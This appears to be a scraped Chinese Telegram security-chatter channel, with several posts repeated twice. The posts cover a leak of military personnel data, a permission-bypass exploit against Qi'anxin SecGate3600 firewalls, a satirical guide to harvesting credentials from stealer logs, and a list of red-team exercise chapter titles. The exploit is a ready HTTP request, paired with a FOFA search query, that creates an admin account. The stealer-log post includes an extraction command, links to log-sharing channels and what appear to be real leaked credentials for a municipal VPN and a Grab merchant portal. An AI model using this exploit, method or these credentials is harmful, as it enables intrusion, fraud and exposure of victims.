新瓜
某人通过弱口令进入某地武装部人事管理系统后台,然后反手发到了qq
后续当事人自称已经提交cnvd了,如果原图信息他发出来的时候自己就打了码,加上提交的了的话我感觉问题倒是不大,不打码把现役身份证职位这些发出来那等着进🍊吧
最新消息
原图发出来没打码,直接泄露了现役军官身份证职务等各种信息,并且byd还把账号密码发给qq上的网友进行传播
某人通过弱口令进入某地武装部人事管理系统后台,然后反手发到了qq
后续当事人自称已经提交cnvd了,如果原图信息他发出来的时候自己就打了码,加上提交的了的话我感觉问题倒是不大,不打码把现役身份证职位这些发出来那等着进🍊吧
最新消息
原图发出来没打码,直接泄露了现役军官身份证职务等各种信息,并且byd还把账号密码发给qq上的网友进行传播
👍18🤯3❤1
奇安信网神 SecGate3600-A1500权限绕过漏洞
fofa语句: "sec_gate_image/button_normal.gif"
fofa语句: "sec_gate_image/button_normal.gif"
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 26
type=saveAdmin&id=2&userName=audit&pwd=audit@1234&net=0.0.0.0&mask=0.0.0.0&port=ANY&allow=Y
👎3👍2🤣1
教大家一个酷酷apt小技巧
首先是在xss.is或者tg老外的频道上找那种分享免费窃取日志的频道,这里有一个日志分享频道的合集 https://www.tgoop.com/addlist/x42QoPnTf8E3YzM0
然后开动电脑狠狠的下几十G这样的日志,尽可能多,然后安装ripgrep,工具地址:https://github.com/BurntSushi/ripgrep 并将目录更改为提取日志的位置
然后运行命令
rg -oUNI "URL:\s(.*?)[|\r]\n用户名:\s(.*?)[|\r]\n密码:\s(.*?)[|\r]\n" -r '$1:$2:$3' --glob-case-insensitive -g "Passwords.txt" > result.txt
这样就会最终生成一个url:user:pass 条目的文件,再结合正则表达式可以轻松查找到你想要的各种东西。现在你可以使用输出的凭据登录到各种不使用2FA的公司。看到这里其实可能很多人都看懂了,这就是传说中的IntelBrokers,老外十多年前玩烂的东西,另外一种意思上扫哥。然后结合一点谷歌上搜到的,tg频道下的花里胡哨的.pdf文件,打包成.zip就可以非常逼真的假装内网打穿了,然后就是出售xxx内网访问权限,年收入xx亿美元,把tg上的二愣子忽悠得一愣一愣的,考死普雷apt大玉
下面我示范一下完整过程,认真学😋
发送,https://www.vpn.opstinamilici.org/index.php
账号:opstina
密码:milici
https://merchant.grab.com/portal
账号:Romadhonna.owner
密码:Salsadhonn4
好了,本无敌大黑客出售美国GrabMart粮食公司还有某国市政府采购集团内网访问权限,年收入分别为46亿和95亿美元,然后内网“绝密数据”的压缩包去bf的频道随便下就是了https://www.tgoop.com/+YRLqvlnUI84zNzZl,一堆那种看不懂的洋文.pdf文件。
然后就是开始发挥你的想象力补充我们团队我们勒索组织怎么内网漫游怎么年入百万美金,这个大家都懂
首先是在xss.is或者tg老外的频道上找那种分享免费窃取日志的频道,这里有一个日志分享频道的合集 https://www.tgoop.com/addlist/x42QoPnTf8E3YzM0
然后开动电脑狠狠的下几十G这样的日志,尽可能多,然后安装ripgrep,工具地址:https://github.com/BurntSushi/ripgrep 并将目录更改为提取日志的位置
然后运行命令
rg -oUNI "URL:\s(.*?)[|\r]\n用户名:\s(.*?)[|\r]\n密码:\s(.*?)[|\r]\n" -r '$1:$2:$3' --glob-case-insensitive -g "Passwords.txt" > result.txt
这样就会最终生成一个url:user:pass 条目的文件,再结合正则表达式可以轻松查找到你想要的各种东西。现在你可以使用输出的凭据登录到各种不使用2FA的公司。看到这里其实可能很多人都看懂了,这就是传说中的IntelBrokers,老外十多年前玩烂的东西,另外一种意思上扫哥。然后结合一点谷歌上搜到的,tg频道下的花里胡哨的.pdf文件,打包成.zip就可以非常逼真的假装内网打穿了,然后就是出售xxx内网访问权限,年收入xx亿美元,把tg上的二愣子忽悠得一愣一愣的,考死普雷apt大玉
下面我示范一下完整过程,认真学😋
发送,https://www.vpn.opstinamilici.org/index.php
账号:opstina
密码:milici
https://merchant.grab.com/portal
账号:Romadhonna.owner
密码:Salsadhonn4
好了,本无敌大黑客出售美国GrabMart粮食公司还有某国市政府采购集团内网访问权限,年收入分别为46亿和95亿美元,然后内网“绝密数据”的压缩包去bf的频道随便下就是了https://www.tgoop.com/+YRLqvlnUI84zNzZl,一堆那种看不懂的洋文.pdf文件。
然后就是开始发挥你的想象力补充我们团队我们勒索组织怎么内网漫游怎么年入百万美金,这个大家都懂
Telegram
logs
You’ve been invited to add the folder “logs”, which includes 28 chats.
🤡13👍2❤1🤨1
总结一下今年国护的历程
第一章 我要成为无敌红高大玉
第二章 我是特种兵之kPH+bIxk5D2deZiIxcaaaA==
第三章 同队的四个牛马大学生毁了我的爆day梦
第四章 封C段b屋檐了
第五章 sql注入领域大神,主站,EZ收徒
第六章 sql注入偶遇安全狗,光速应急强如怪物,拼尽全力也无法战胜😭😭😭
第七章 反转了,并非无法战胜
第八章 又反转了,蓝队究极嘴遁机关枪,好想草死裁判的马
第九章 计划有变,爆第二波day
第十章 拔线
第十一章 拔线
第十二章 拔线
第十三章 薪王干拉,准备无感
第十四章 what can i say,四人蜜罐高交互蹲红
第十五章 朋友圈溯源和telegram酷酷bot
第十六章 IP属地:啊米诺斯国一得阁拉米市
第十七章 云锁bypass
第十八章 从userId越权到目录遍历到rce到拔线
第十九章 继续拔线,压力来到旁站
第二十章 钓鱼,github与back.zip
第二十一章 webapp/controller/FileController.java
第二十二章 古い世代の芸術BlueTeamの自信と冷静さ
第二十三章 我已经受够了繁文缛节😑
👊fscan.exe🖐🏼
第二十四章 指挥部,我真的好喜欢你啊,为了你,我要唱一等情事
第一章 我要成为无敌红高大玉
第二章 我是特种兵之kPH+bIxk5D2deZiIxcaaaA==
第三章 同队的四个牛马大学生毁了我的爆day梦
第四章 封C段b屋檐了
第五章 sql注入领域大神,主站,EZ收徒
第六章 sql注入偶遇安全狗,光速应急强如怪物,拼尽全力也无法战胜😭😭😭
第七章 反转了,并非无法战胜
第八章 又反转了,蓝队究极嘴遁机关枪,好想草死裁判的马
第九章 计划有变,爆第二波day
第十章 拔线
第十一章 拔线
第十二章 拔线
第十三章 薪王干拉,准备无感
第十四章 what can i say,四人蜜罐高交互蹲红
第十五章 朋友圈溯源和telegram酷酷bot
第十六章 IP属地:啊米诺斯国一得阁拉米市
第十七章 云锁bypass
第十八章 从userId越权到目录遍历到rce到拔线
第十九章 继续拔线,压力来到旁站
第二十章 钓鱼,github与back.zip
第二十一章 webapp/controller/FileController.java
第二十二章 古い世代の芸術BlueTeamの自信と冷静さ
第二十三章 我已经受够了繁文缛节😑
👊fscan.exe🖐🏼
第二十四章 指挥部,我真的好喜欢你啊,为了你,我要唱一等情事
🕊18👍2🤩2🤮1🤗1